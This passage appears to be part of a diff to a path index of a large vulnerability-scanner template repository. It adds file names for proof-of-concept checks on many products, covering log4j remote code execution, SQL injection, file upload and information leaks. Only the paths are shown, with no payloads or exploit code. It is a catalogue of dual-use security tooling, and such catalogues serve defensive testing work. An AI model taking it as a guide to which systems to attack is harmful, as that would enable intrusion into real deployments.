./poc/nodejs/npm-accesstoken.yaml ./poc/nodejs/npm-anonymous-cli.yaml @@ -62020,6 +62118,7 @@ ./poc/oracle/oracle-xdb.yaml ./poc/oracle/oracledomparser_xxeinjection.yaml ./poc/oracle/unrestricted-sg-ingress-oracledb-port.yaml +./poc/oracle/xss-oracle.yaml ./poc/other/.appveyor.yml ./poc/other/.build.yml ./poc/other/.cent.yaml @@ -62063,6 +62162,8 @@ ./poc/other/12-step-meeting-list-4bf07d1e5a2f794295c15f8f757f40ac.yaml ./poc/other/12-step-meeting-list-86c3c84e57dc131c9759740a5975073a.yaml ./poc/other/12-step-meeting-list.yaml +./poc/other/12.1.1.2.yaml +./poc/other/12.1.1.yaml ./poc/other/123-chat-videochat-1050a0dc63f69ad77a3b1dd0233cad1d.yaml ./poc/other/123-chat-videochat.yaml ./poc/other/13.2.1.yaml @@ -62232,6 +62333,8 @@ ./poc/other/5-stars-rating-funnel-ca8cc39bb5282914f877821d87c76a75.yaml ./poc/other/5-stars-rating-funnel-f029167d475980fa5bee5bdd21328b34.yaml ./poc/other/5-stars-rating-funnel.yaml +./poc/other/5.1.5.yaml +./poc/other/5.3.3.1.yaml ./poc/other/50 - T15.yml ./poc/other/51 - T16.yml ./poc/other/52 - T17.yml @@ -62268,9 +62371,11 @@ ./poc/other/7moor-product.yaml ./poc/other/8-degree-notification-bar-c67319f4154995b42b270dcd686df733.yaml ./poc/other/8-degree-notification-bar.yaml +./poc/other/8.2.1.yaml ./poc/other/823623832.yaml ./poc/other/834385017.yaml ./poc/other/845713912.yaml +./poc/other/9.1.2.yaml ./poc/other/9.1.3.yaml ./poc/other/99fy-core-a3f784c81b664fa5a625984725c83e0b.yaml ./poc/other/99fy-core.yaml @@ -63428,6 +63533,7 @@ ./poc/other/advanced-ajax-page-loader-94b986ce02c9c2e3c3d960667cb1b92d.yaml ./poc/other/advanced-ajax-page-loader.yaml ./poc/other/advanced-backgrounds-7eca2ce569a1f864194b199d672f550a.yaml +./poc/other/advanced-backgrounds.yaml ./poc/other/advanced-booking-calendar-14ec1d72b66e6743ab3b4dce700bdfbf.yaml ./poc/other/advanced-booking-calendar-1a2ee554af2bac4ad469ee7bed611a9a.yaml ./poc/other/advanced-booking-calendar-1b2f93fedafab9000d6f605166dac9f8.yaml @@ -64088,6 +64194,7 @@ ./poc/other/ambience-theme.yaml ./poc/other/ambience.yaml ./poc/other/ambuf-onlineexam.yaml +./poc/other/amcharts-charts-and-maps-4b370fcafcc0619a561d13639d3f142f.yaml ./poc/other/amcharts-charts-and-maps-f9da8d5aebda9e4941fa4c6545224d1a.yaml ./poc/other/amcharts-charts-and-maps.yaml ./poc/other/ameblo.yaml @@ -66102,6 +66209,7 @@ ./poc/other/booked-52f10f5b00d5b865f3ec1d35a09bc8c7.yaml ./poc/other/booked-cc63b18b15f6ecc630ccd836a52175c4.yaml ./poc/other/booked-d41d8cd98f00b204e9800998ecf8427e.yaml +./poc/other/booked-export-csv.yaml ./poc/other/booked-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/booked-plugin.yaml ./poc/other/booked.yaml @@ -67072,6 +67180,7 @@ ./poc/other/calculator-builder.yaml ./poc/other/calculatorpro-calculators-ca0cbf3c8d45825c30255a3139df50c2.yaml ./poc/other/calculatorpro-calculators.yaml +./poc/other/caldera-c2.yaml ./poc/other/calendar-16959bb7a77786fa99adf23cd6bcb3b8.yaml ./poc/other/calendar-1b136725c08c20abf79c4380e79bcff6.yaml ./poc/other/calendar-booking-830a27ef52874c6842aa01d3d38a46c5.yaml @@ -68692,6 +68801,7 @@ ./poc/other/connections-plugin.yaml ./poc/other/connections.yaml ./poc/other/connectwise-panel.yaml +./poc/other/connectwise-setup.yaml ./poc/other/consensu-io-959ddc02bf7e20889ee3e75bce04f1df.yaml ./poc/other/consensu-io.yaml ./poc/other/construct-08675bcc1f60477d714acb4400b3b900.yaml @@ -70499,6 +70609,7 @@ ./poc/other/discourse.yaml ./poc/other/discusselasticco.yaml ./poc/other/discuz-info-admincp.yaml +./poc/other/discuz-panel.yaml ./poc/other/discuz-wooyun-2010-080723.yaml ./poc/other/discuz-wooyun-2010-080723.yml ./poc/other/discuz.yaml @@ -72452,6 +72563,7 @@ ./poc/other/esplanade-theme-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/esplanade-theme.yaml ./poc/other/esplanade.yaml +./poc/other/espocrm-installer.yaml ./poc/other/esri-arcgis.yaml ./poc/other/essence-2f388ea9e9ab48631b96ab46d4bcca71.yaml ./poc/other/essence-a560a32e5476f30f563c8e474855b204.yaml @@ -75387,6 +75499,7 @@ ./poc/other/gravatar.yaml ./poc/other/gravitate-qa-tracker.yaml ./poc/other/graylog-log4j.yaml +./poc/other/graylog-panel.yaml ./poc/other/graylog.yaml ./poc/other/great-quotes-b9ff6fdd55a9b22b32ddac6bebb6e805.yaml ./poc/other/great-quotes.yaml @@ -75599,6 +75712,7 @@ ./poc/other/h2csmuggle-nuclei.yaml ./poc/other/h2csmuggle-upgrade-only-nuclei.yaml ./poc/other/h2o-arbitary-file-read.yaml +./poc/other/h2o-dashboard.yaml ./poc/other/h2o.yaml ./poc/other/h3c secpath 运维审计系统.yaml ./poc/other/h3c-cas.yaml @@ -78064,6 +78178,7 @@ ./poc/other/knowledgebase-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/knowledgebase-plugin.yaml ./poc/other/knowledgebase.yaml +./poc/other/knowledgetree-installer.yaml ./poc/other/knowyourmeme.yaml ./poc/other/ko-fi-button-9325aa24d072619f5651560e247384bb.yaml ./poc/other/ko-fi-button.yaml @@ -78490,6 +78605,7 @@ ./poc/other/learnpress-564a9fb7cfea0ff2a45b7867a4ae2fd9.yaml ./poc/other/learnpress-5795dae947d75ff28803638f0fc808ab.yaml ./poc/other/learnpress-5be47a6f6a60b58d052fb7558c0b50fb.yaml +./poc/other/learnpress-5c26a1848cda845d9b97374472d49eb0.yaml ./poc/other/learnpress-651bdfd7a126bd5ba04664d29f615821.yaml ./poc/other/learnpress-6b539e5bab49bc636b25cfa2bb0f6104.yaml ./poc/other/learnpress-6e9f6f17e6084384ef692acb669a8185.yaml @@ -78520,6 +78636,7 @@ ./poc/other/learnpress-eedaa6c99930b98ac9d187c905349bd2.yaml ./poc/other/learnpress-f0b30b3fe06ed749ddc5c1c74c0c46f3.yaml ./poc/other/learnpress-f707cb8bb04eb6ac82ddeb976e9566e3.yaml +./poc/other/learnpress-fcb8158f71307795525b9840bda82742.yaml ./poc/other/learnpress-import-export-4808c4733291625aebcafcb739998352.yaml ./poc/other/learnpress-import-export-781d3d408316c6ba4e0dfff74447c45e.yaml ./poc/other/learnpress-import-export-8ff6c53fc75f54a14303014a2c8a1705.yaml @@ -82271,6 +82388,7 @@ ./poc/other/order-your-posts-manually.yaml ./poc/other/orderbook.yaml ./poc/other/ordermanagementsystem.yaml +./poc/other/ords-panel.yaml ./poc/other/orenosv.yaml ./poc/other/organization-chart-9be13731d7f139bf1e66987b076421d6.yaml ./poc/other/organization-chart-b7c6ef6c9a597e5f8be1545eff498dc5.yaml @@ -86959,6 +87077,7 @@ ./poc/other/shared-files-b60883826b013ff1012dfe97579b11c9.yaml ./poc/other/shared-files.yaml ./poc/other/sharefile-panel.yaml +./poc/other/sharefile-storage-server.yaml ./poc/other/sharefile_storage_zones_controller.yaml ./poc/other/sharethis-share-buttons-9e60d2ab07fe70880c141c626be14dfc.yaml ./poc/other/sharethis-share-buttons.yaml @@ -88451,6 +88570,7 @@ ./poc/other/sp-rental-manager.yaml ./poc/other/spa-and-salon-d8dec93d7693bf22caf0cca4ae5f7f42.yaml ./poc/other/spa-and-salon.yaml +./poc/other/spa-cart-installer.yaml ./poc/other/spacelogic-cbus-panel.yaml ./poc/other/spacelogic_c-bus_home_controller_firmware.yaml ./poc/other/spacer-075ae38a8c1da7cb621b2b71cac6674e.yaml @@ -90468,6 +90588,7 @@ ./poc/other/tongda-OA.yaml ./poc/other/tongda-oa.yaml ./poc/other/tongda-v2017-video-file-file-read.yaml +./poc/other/tongda-video-file-read.yaml ./poc/other/tongda-workflow.yaml ./poc/other/toolbar-extras-6f3392582979e59d1ae0fbfcb1420605.yaml ./poc/other/toolbar-extras.yaml @@ -92849,6 +92970,7 @@ ./poc/other/weaverx-theme-support.yaml ./poc/other/wechat-broadcast-a8c47569a83f534b44638d64efb76d6d.yaml ./poc/other/wechat-broadcast.yaml +./poc/other/wechat-info-leak.yaml ./poc/other/wechat-reward-7f155dfe1d3cce8791fd074724b6b008.yaml ./poc/other/wechat-reward.yaml ./poc/other/wedevs-project-manager-14963541d2314ab58423512ed4bb3c81.yaml @@ -94342,8 +94464,10 @@ ./poc/other/yonyou-intelligentplant.yaml ./poc/other/yonyou-ism.yaml ./poc/other/yonyou-ksoa.yaml +./poc/other/yonyou-nc-baseapp-deserialization.yaml ./poc/other/yonyou-nc-cloud.yaml ./poc/other/yonyou-nc-downcourseware-file-read.yaml +./poc/other/yonyou-nc-info-leak.yaml ./poc/other/yonyou-nc-uapws-xml-fileread.yaml ./poc/other/yonyou-nc-workflow.yaml ./poc/other/yonyou-rmis.yaml @@ -95096,6 +95220,7 @@ ./poc/php/cryptographp-db0995fcce0b587938843ee9f532e46f.yaml ./poc/php/cryptographp.yaml ./poc/php/custom-css-js-php-38595c300b5439c3ff06f9de9b42f302.yaml +./poc/php/custom-css-js-php.yaml ./poc/php/default-cakephp-page.yaml ./poc/php/douphp.yaml ./poc/php/drupal_module-acl-arbitrary-php-code-execution.yaml @@ -95279,6 +95404,7 @@ ./poc/php/phpfox.yaml ./poc/php/phpfreechat-48a23c4f9c3626791edc2518ad66ffc9.yaml ./poc/php/phpfreechat.yaml +./poc/php/phpgedview-installer.yaml ./poc/php/phpinfo-1.yaml ./poc/php/phpinfo-10.yaml ./poc/php/phpinfo-11.yaml @@ -95314,6 +95440,7 @@ ./poc/php/phpldapadmin-panel.yaml ./poc/php/phpldapadmin-xss.yaml ./poc/php/phpldapadmin.yaml +./poc/php/phplist-detect.yaml ./poc/php/phplist-邮件系统.yaml ./poc/php/phplist.yaml ./poc/php/phpmemcached-admin-panel.yaml @@ -95408,6 +95535,7 @@ ./poc/php/phpstudy.yaml ./poc/php/phpsword-favicon-manager-7f890c6483fca4d34ecced25fbeb779a.yaml ./poc/php/phpsword-favicon-manager.yaml +./poc/php/phpsys-info.yaml ./poc/php/phpsysinfo.yaml ./poc/php/phpunit-9555.yaml ./poc/php/phpunit-9556.yaml @@ -96073,6 +96201,8 @@ ./poc/remote_code_execution/cisco-cloudcenter-suite-log4j-rce.yaml ./poc/remote_code_execution/cisco-cloudcenter-suite-rce.yaml ./poc/remote_code_execution/cisco-rv-series-rce.yaml +./poc/remote_code_execution/cisco-webex-log4j-rce.yaml +./poc/remote_code_execution/citrix-xenapp-log4j-rce.yaml ./poc/remote_code_execution/clearpay-gateway-for-woocommerce-450f3fa1fdfaa0d436f04229a0397315.yaml ./poc/remote_code_execution/clearpay-gateway-for-woocommerce-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/remote_code_execution/clearpay-gateway-for-woocommerce-e712c3dafb88df20f5fadf366f459639.yaml @@ -96569,7 +96699,9 @@ ./poc/remote_code_execution/first-order-discount-woocommerce.yaml ./poc/remote_code_execution/flexible-woocommerce-checkout-field-editor-c19aa259446a2160cebff3bedcae8458.yaml ./poc/remote_code_execution/flexible-woocommerce-checkout-field-editor.yaml +./poc/remote_code_execution/flexnet-log4j-rce.yaml ./poc/remote_code_execution/flink-upload-rce.yaml +./poc/remote_code_execution/flir-ax8-rce.yaml ./poc/remote_code_execution/flir-ax8-res-php-rce.yaml ./poc/remote_code_execution/focus-on-reviews-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml ./poc/remote_code_execution/focus-on-reviews-for-woocommerce-ff9293ba28748efa2ab9a2fe77385468.yaml @@ -96861,6 +96993,7 @@ ./poc/remote_code_execution/mailchimp-for-woocommerce.yaml ./poc/remote_code_execution/makecommerce-d64de48280006e9db4915008aca3501d.yaml ./poc/remote_code_execution/makecommerce.yaml +./poc/remote_code_execution/manage-engine-dc-log4j-rce.yaml ./poc/remote_code_execution/map-location-picker-at-checkout-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml ./poc/remote_code_execution/map-location-picker-at-checkout-for-woocommerce-ce939a1f42ea4be90a3ab67bfaa89137.yaml ./poc/remote_code_execution/map-location-picker-at-checkout-for-woocommerce-f5d45261d904c761470f6018132e92c5.yaml @@ -97008,6 +97141,7 @@ ./poc/remote_code_execution/opencpu-rce.yaml ./poc/remote_code_execution/opendreambox-webadmin-rce.yaml ./poc/remote_code_execution/opennms-log4j-jndi-rce.yaml +./poc/remote_code_execution/openshift-log4j-rce.yaml ./poc/remote_code_execution/opensns-rce-1.yaml ./poc/remote_code_execution/opensns-rce-2.yaml ./poc/remote_code_execution/opensns-rce-9320.yaml @@ -97070,6 +97204,7 @@ ./poc/remote_code_execution/panabit-sy_addmount-rce.yaml ./poc/remote_code_execution/pandorafms-cve-2019-20224-rce.yaml ./poc/remote_code_execution/pandorafms-cve-2019-20224-rce.yml +./poc/remote_code_execution/papercut-log4j-rce.yaml ./poc/remote_code_execution/parcel-tracker-ecourier-102353dc8e1f02661d6e7f970ee16c34.yaml ./poc/remote_code_execution/parcel-tracker-ecourier-1fbda1a354e4e1e6f5f905808cc4736f.yaml ./poc/remote_code_execution/parcel-tracker-ecourier-4e97cd21a484b6166595c229339c2254.yaml @@ -97427,6 +97562,7 @@ ./poc/remote_code_execution/ruijie-networks-rce-9948.yaml ./poc/remote_code_execution/ruijie-networks-rce-9949.yaml ./poc/remote_code_execution/ruijie-networks-rce.yaml +./poc/remote_code_execution/ruijie-nmc-sync-rce.yaml ./poc/remote_code_execution/ruijie-rg-eg-web-mis-rce.yaml ./poc/remote_code_execution/ruijie-rg-uac-rce.yaml ./poc/remote_code_execution/ruijie-uac-remote-rce.yaml @@ -97699,6 +97835,7 @@ ./poc/remote_code_execution/swipehq-payment-gateway-woocommerce.yaml ./poc/remote_code_execution/swipehq-payment-gateway-wp-e-commerce-443842d1d8712ea7662492da3baca3c2.yaml ./poc/remote_code_execution/swipehq-payment-gateway-wp-e-commerce.yaml +./poc/remote_code_execution/symantec-sepm-log4j-rce.yaml ./poc/remote_code_execution/symfonyrce(1).yaml ./poc/remote_code_execution/symfonyrce.yaml ./poc/remote_code_execution/sync-ecommerce-neo-6477bf18cad6c823db485408d49b337b.yaml @@ -97780,6 +97917,7 @@ ./poc/remote_code_execution/tomcat-cve-2017-12615-rce.yml ./poc/remote_code_execution/tomcat-manager-bruteforce.yaml ./poc/remote_code_execution/tongda-gateway-rce.yaml +./poc/remote_code_execution/tongda-getdata-rce.yaml ./poc/remote_code_execution/tongda-oa-dologin-rce.yaml ./poc/remote_code_execution/tongda-oa-v11-9-getdata-rce.yaml ./poc/remote_code_execution/tongda-v11-getdata-rce.yaml @@ -97879,6 +98017,7 @@ ./poc/remote_code_execution/wavlnk_router_rce.yaml ./poc/remote_code_execution/wc-customer-source-3baa6cc7c9b97bdb322dbcfa3bb0f658.yaml ./poc/remote_code_execution/wc-customer-source.yaml +./poc/remote_code_execution/weaver-ecology-bshservlet-rce.yaml ./poc/remote_code_execution/weaver_e_mobile_6_rce.yaml ./poc/remote_code_execution/webappick-pdf-invoice-for-woocommerce-55347e9ac58126992d50d45693e54288.yaml ./poc/remote_code_execution/webappick-pdf-invoice-for-woocommerce-621a86ac69fc43f58c97e1a34ee9115f.yaml @@ -98443,6 +98582,7 @@ ./poc/remote_code_execution/woocommerce-pdf-vouchers-f2e20e333c1c84b75ca0fcb1020fa3d0.yaml ./poc/remote_code_execution/woocommerce-pdf-vouchers.yaml ./poc/remote_code_execution/woocommerce-photo-reviews-8eabd8f3601428e7f9c625d55482bc6c.yaml +./poc/remote_code_execution/woocommerce-photo-reviews.yaml ./poc/remote_code_execution/woocommerce-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/remote_code_execution/woocommerce-plugin.yaml ./poc/remote_code_execution/woocommerce-pos-c5391e8d69ffbd0565b5ecdd695e1050.yaml @@ -98770,6 +98910,7 @@ ./poc/remote_code_execution/wp-infusionsoft-woocommerce-e2b56e01ba06c66b8d53d40581b73ce6.yaml ./poc/remote_code_execution/wp-infusionsoft-woocommerce.yaml ./poc/remote_code_execution/wp-kadence-blocks-rce.yaml +./poc/remote_code_execution/wp-social-warfare-rce.yaml ./poc/remote_code_execution/wp-source-control-1c031a30792c8eeff23b48219d4181d7.yaml ./poc/remote_code_execution/wp-source-control.yaml ./poc/remote_code_execution/wp-woo-commerce-sync-for-g-sheet-6477bf18cad6c823db485408d49b337b.yaml @@ -99142,6 +99283,7 @@ ./poc/remote_code_execution/yonyou-nc-bshservlet-rce.yaml ./poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml ./poc/remote_code_execution/yonyou-nc-cloud-rce.yaml +./poc/remote_code_execution/yonyou-nc-ncmessageservlet-rce.yaml ./poc/remote_code_execution/yonyou-nc-servlet-upload-rce.yaml ./poc/remote_code_execution/yonyou_nc_getdatasourceconfig_unauthorized.yaml ./poc/remote_code_execution/yonyou_nc_jsinvoke_rce.yaml @@ -99550,6 +99692,7 @@ ./poc/search/elasticsearch-cve-2015-3337-lfi.yml ./poc/search/elasticsearch-cve-2015-5531.yaml ./poc/search/elasticsearch-cve-2015-5531.yml +./poc/search/elasticsearch-default-login.yaml ./poc/search/elasticsearch-insecure-default-config.yaml ./poc/search/elasticsearch-log4j.yaml ./poc/search/elasticsearch-sql-client-detect-7189.yaml @@ -101140,6 +101283,7 @@ ./poc/social/wp-social-invitations.yaml ./poc/social/wp-social-sharing-eda59f81748daf05c10fe49d04ee8954.yaml ./poc/social/wp-social-sharing.yaml +./poc/social/wp-social-warfare-rce.yaml ./poc/social/wp-social-widget-99c69545759f5e9561e2866256c68f33.yaml ./poc/social/wp-social-widget-d7b289a4844fbc5f1814a16ab030f4b4.yaml ./poc/social/wp-social-widget.yaml @@ -101203,6 +101347,7 @@ ./poc/sql/74cms-sqli-9.yaml ./poc/sql/74cms-sqli.yaml ./poc/sql/74cms-sqli.yml +./poc/sql/74cms-weixin-sqli.yaml ./poc/sql/74cms_V3-plusa-sqli.yaml ./poc/sql/74cms_v4-register-sqli.yaml ./poc/sql/AMSS-sqli.yaml @@ -103094,6 +103239,7 @@ ./poc/sql/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml ./poc/sql/CVE-2024-8325-11327d2b9e1fdbe3b095a728909b8615.yaml ./poc/sql/CVE-2024-8369-371892027f1c271d3247dba36b384fb8.yaml +./poc/sql/CVE-2024-8622-0703e404cdba311680d3e36cfe2a24e3.yaml ./poc/sql/Changdao-165-SQLi.yaml ./poc/sql/Cmseasy-Http-Head-sqli.yaml ./poc/sql/Cmseasy-celive-sqli.yaml @@ -103278,6 +103424,7 @@ ./poc/sql/PbootCMS-search-SQL.yaml ./poc/sql/Qibocms-SQLi.yaml ./poc/sql/SQLInjection_ERROR.yaml +./poc/sql/SQLNet-log.yaml ./poc/sql/SQL_injection-Authentification.yaml ./poc/sql/SQL_injection-Error.yaml ./poc/sql/SQL_injection-Numeric.yaml @@ -104602,6 +104749,7 @@ ./poc/sql/ecology-loginSSO-sql-CNVD-2021-33202.yaml ./poc/sql/ecology-oa-FileDownloadForOutDoc-sqli.yaml ./poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml +./poc/sql/ecology-oa-file-sqli.yaml ./poc/sql/ecology-oa-filedownloadforoutdoc-sqli.yaml ./poc/sql/ecology-sqli2.yaml ./poc/sql/ecology-syncuserinfo-sqli-7176.yaml @@ -105755,6 +105903,7 @@ ./poc/sql/mysql-detect.yaml ./poc/sql/mysql-dump-files.yaml ./poc/sql/mysql-empty-password.yaml +./poc/sql/mysql-history.yaml ./poc/sql/mysql-info.yaml ./poc/sql/mysql-load-file.yaml ./poc/sql/mysql-my-cnf-disclosure.yaml @@ -105857,6 +106006,7 @@ ./poc/sql/odoo-database-manager-9204.yaml ./poc/sql/odoo-database-manager-9205.yaml ./poc/sql/odoo-database-manager.yaml +./poc/sql/odoo-unprotected-database.yaml ./poc/sql/off-canvas-sidebars-6ad11d341ff184481eedb5b9451b7483.yaml ./poc/sql/official-mailerlite-sign-up-forms-6707baefec25107b95f6524fdb5e747c.yaml ./poc/sql/olive-one-click-demo-import-969f79d83aae53a4cdb4fc966dc1c19e.yaml @@ -106981,6 +107131,7 @@ ./poc/sql/tmdb.yaml ./poc/sql/tongda-delete-seal-sqli.yaml ./poc/sql/tongda-insert-sql-inject-getshell.yaml +./poc/sql/tongda-insert-sqli.yaml ./poc/sql/tongda-oa-auth-sql.yaml ./poc/sql/tongda-oa-general-handle-form-sqli.yaml ./poc/sql/tongda-oa-general-system-seal-manage-unauth-sqli.yaml @@ -106999,6 +107150,7 @@ ./poc/sql/tongda-oa-v11-6-insert-sqli.yaml ./poc/sql/tongda-oa-v11-6-report-bi-sqli.yaml ./poc/sql/tongda-report-bi-func-sql-inject.yaml +./poc/sql/tongda-report-func-sqli.yaml ./poc/sql/tongda-sqli.yaml ./poc/sql/tongda-swfupload-new-sql-inject.yaml ./poc/sql/tongda_oa_get_datas_sqli.yaml @@ -107276,8 +107428,12 @@ ./poc/sql/wd-facebook-feed-6856e6f571b9e2dba73efb4f64b1586a.yaml ./poc/sql/wd-facebook-feed-692e628db2f9602b334156cb9fc72ee5.yaml ./poc/sql/weather-atlas-dfb9db424f295d9c4146acfe38e9fa83.yaml +./poc/sql/weaver-checkserver-sqli.yaml +./poc/sql/weaver-ecology-getsqldata-sqli.yaml +./poc/sql/weaver-ecology-hrmcareer-sqli.yaml ./poc/sql/weaver-ecology-workflowservicexml-sqli.yaml ./poc/sql/weaver-group-xml-sqli.yaml +./poc/sql/weaver-mysql-config-info-leak.yaml ./poc/sql/weaver_e_cology9_SQL.yaml ./poc/sql/weaver_eoffice_init_sqli.yaml ./poc/sql/weaverx-theme-support-db33413f81b981a56a44cbdf82e1f45f.yaml @@ -108228,6 +108384,7 @@ ./poc/sql_injection/74cms-sqli-9.yaml ./poc/sql_injection/74cms-sqli.yaml ./poc/sql_injection/74cms-sqli.yml +./poc/sql_injection/74cms-weixin-sqli.yaml ./poc/sql_injection/74cms_V3-plusa-sqli.yaml ./poc/sql_injection/74cms_v4-register-sqli.yaml ./poc/sql_injection/AMSS-sqli.yaml @@ -108431,6 +108588,7 @@ ./poc/sql_injection/PbootCMS-search-SQL.yaml ./poc/sql_injection/Qibocms-SQLi.yaml ./poc/sql_injection/SQLInjection_ERROR.yaml +./poc/sql_injection/SQLNet-log.yaml ./poc/sql_injection/SQL_injection-Authentification.yaml ./poc/sql_injection/SQL_injection-Error.yaml ./poc/sql_injection/SQL_injection-Numeric.yaml @@ -108589,6 +108747,7 @@ ./poc/sql_injection/ecology-loginSSO-sql-CNVD-2021-33202.yaml ./poc/sql_injection/ecology-oa-FileDownloadForOutDoc-sqli.yaml ./poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml +./poc/sql_injection/ecology-oa-file-sqli.yaml ./poc/sql_injection/ecology-oa-filedownloadforoutdoc-sqli.yaml ./poc/sql_injection/ecology-sqli2.yaml ./poc/sql_injection/ecology-syncuserinfo-sqli-7176.yaml @@ -108772,6 +108931,7 @@ ./poc/sql_injection/mysql-detect.yaml ./poc/sql_injection/mysql-dump-files.yaml ./poc/sql_injection/mysql-empty-password.yaml +./poc/sql_injection/mysql-history.yaml ./poc/sql_injection/mysql-info.yaml ./poc/sql_injection/mysql-load-file.yaml ./poc/sql_injection/mysql-my-cnf-disclosure.yaml @@ -108979,6 +109139,7 @@ ./poc/sql_injection/time_sql_peremeter.yaml ./poc/sql_injection/tongda-delete-seal-sqli.yaml ./poc/sql_injection/tongda-insert-sql-inject-getshell.yaml +./poc/sql_injection/tongda-insert-sqli.yaml ./poc/sql_injection/tongda-oa-auth-sql.yaml ./poc/sql_injection/tongda-oa-general-handle-form-sqli.yaml ./poc/sql_injection/tongda-oa-general-system-seal-manage-unauth-sqli.yaml @@ -108997,6 +109158,7 @@ ./poc/sql_injection/tongda-oa-v11-6-insert-sqli.yaml ./poc/sql_injection/tongda-oa-v11-6-report-bi-sqli.yaml ./poc/sql_injection/tongda-report-bi-func-sql-inject.yaml +./poc/sql_injection/tongda-report-func-sqli.yaml ./poc/sql_injection/tongda-sqli.yaml ./poc/sql_injection/tongda-swfupload-new-sql-inject.yaml ./poc/sql_injection/tongda_oa_get_datas_sqli.yaml @@ -109039,8 +109201,12 @@ ./poc/sql_injection/wanhuOA-sqli-savePersonInfo.yaml ./poc/sql_injection/wanhu_ezoffice_SendFileCheckTemplateEdit_sqli.yaml ./poc/sql_injection/wanhuoa_ezoffice_aiframe_sqli.yaml +./poc/sql_injection/weaver-checkserver-sqli.yaml +./poc/sql_injection/weaver-ecology-getsqldata-sqli.yaml +./poc/sql_injection/weaver-ecology-hrmcareer-sqli.yaml ./poc/sql_injection/weaver-ecology-workflowservicexml-sqli.yaml ./poc/sql_injection/weaver-group-xml-sqli.yaml +./poc/sql_injection/weaver-mysql-config-info-leak.yaml ./poc/sql_injection/weaver_e_cology9_SQL.yaml ./poc/sql_injection/weaver_eoffice_init_sqli.yaml ./poc/sql_injection/wecrm-SmsDataList-sqli.yaml @@ -110453,10 +110619,13 @@ ./poc/upload/wanhu-smartUpload-fileupload.yaml ./poc/upload/wanhu_ezoffice_fileUpload_controller_upload.yaml ./poc/upload/weaver-ecology-ktreeuploadaction-file-upload.yaml +./poc/upload/weaver-eoffice-file-upload.yaml ./poc/upload/weaver-jquery-file-upload.yaml +./poc/upload/weaver-ktreeuploadaction-file-upload.yaml ./poc/upload/weaver-lazyuploadify-file-upload.yaml ./poc/upload/weaver-office-server-file-upload.yaml ./poc/upload/weaver-uploadify-file-upload.yaml +./poc/upload/weaver-uploadoperation-file-upload.yaml ./poc/upload/weaver_e_office9_upload.yaml ./poc/upload/webservice_upload.yaml ./poc/upload/webservice_upload2.yaml @@ -110534,6 +110703,7 @@ ./poc/upload/wp-file-uploader-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/upload/wp-file-uploader-plugin.yaml ./poc/upload/wp-file-uploader.yaml +./poc/upload/wp-gallery-file-upload.yaml ./poc/upload/wp-maximum-upload-file-size-55347e9ac58126992d50d45693e54288.yaml ./poc/upload/wp-maximum-upload-file-size-621a86ac69fc43f58c97e1a34ee9115f.yaml ./poc/upload/wp-maximum-upload-file-size-9288e4a0cabda289c3e3782d8a4f171e.yaml @@ -110578,6 +110748,7 @@ ./poc/upload/yonyou-nc-arbitrary-file-upload.yml ./poc/upload/yonyou-nc-cloud-Upload.yaml ./poc/upload/yonyou-nc-cloud-ncchr-attachment-uploadChunk-fileupload.yaml +./poc/upload/yonyou-nc-dispatcher-fileupload.yaml ./poc/upload/yonyou-nc-grouptemplet-fileupload.yaml ./poc/upload/yonyou-nc-servlet-upload-rce.yaml ./poc/upload/yonyou-nc-uploadfile-fileupload.yaml @@ -110821,6 +110992,7 @@ ./poc/web/catch-web-tools.yaml ./poc/web/chatgpt-web-unauth.yaml ./poc/web/chinatelecomequipmentwebconfigurationsystem.yaml +./poc/web/cisco-webex-log4j-rce.yaml ./poc/web/cisco-webex.yaml ./poc/web/cisco-webvpn-detect.yaml ./poc/web/citrix-web-pn-server.yaml @@ -110849,6 +111021,7 @@ ./poc/web/core-web-vitals-pagespeed-booster-c2e9c05d82abd78bc90a975254e47100.yaml ./poc/web/core-web-vitals-pagespeed-booster.yaml ./poc/web/custom-weblogic-SSRF-detect.yaml +./poc/web/cvsweb-detect.yaml ./poc/web/cwp-webpanel.yaml ./poc/web/cypress-web-config.yaml ./poc/web/dahua-web-panel.yaml @@ -110884,6 +111057,7 @@ ./poc/web/edusoho-open-source-web-classroom-.yaml ./poc/web/ehanced-webpack-sourcemap-disclosure.yaml ./poc/web/ehole-web-fingerprints.yaml +./poc/web/element-web-detect.yaml ./poc/web/embedthis-appweb.yaml ./poc/web/emc-documentum-webtop.yaml ./poc/web/emerson-xweb-evo.yaml @@ -116025,6 +116199,7 @@ ./poc/wordpress/wp-fusion-lite.yaml ./poc/wordpress/wp-gallery-exporter-3f1adc6ccbb78d095c27d60e9e3bd3d1.yaml ./poc/wordpress/wp-gallery-exporter.yaml +./poc/wordpress/wp-gallery-file-upload.yaml ./poc/wordpress/wp-gallery-metabox-fbec50dd3d7076cf144a2ff1fbe67890.yaml ./poc/wordpress/wp-gallery-metabox.yaml ./poc/wordpress/wp-gdpr-compliance-0170126c3142c8b176fd7f76634dae15.yaml @@ -117449,6 +117624,7 @@ ./poc/wordpress/wp-real-estate-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-real-estate-theme-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-real-estate-theme.yaml +./poc/wordpress/wp-real-estate-xss.yaml ./poc/wordpress/wp-real-estate.yaml ./poc/wordpress/wp-realty-13c9e77167bbc26d163b916b07cd1698.yaml ./poc/wordpress/wp-realty-2c80d9878e0e3a179c04b0f1bdbe1067.yaml @@ -117980,6 +118156,7 @@ ./poc/wordpress/wp-social-invitations.yaml ./poc/wordpress/wp-social-sharing-eda59f81748daf05c10fe49d04ee8954.yaml ./poc/wordpress/wp-social-sharing.yaml +./poc/wordpress/wp-social-warfare-rce.yaml ./poc/wordpress/wp-social-widget-99c69545759f5e9561e2866256c68f33.yaml ./poc/wordpress/wp-social-widget-d7b289a4844fbc5f1814a16ab030f4b4.yaml ./poc/wordpress/wp-social-widget.yaml @@ -118202,6 +118379,7 @@ 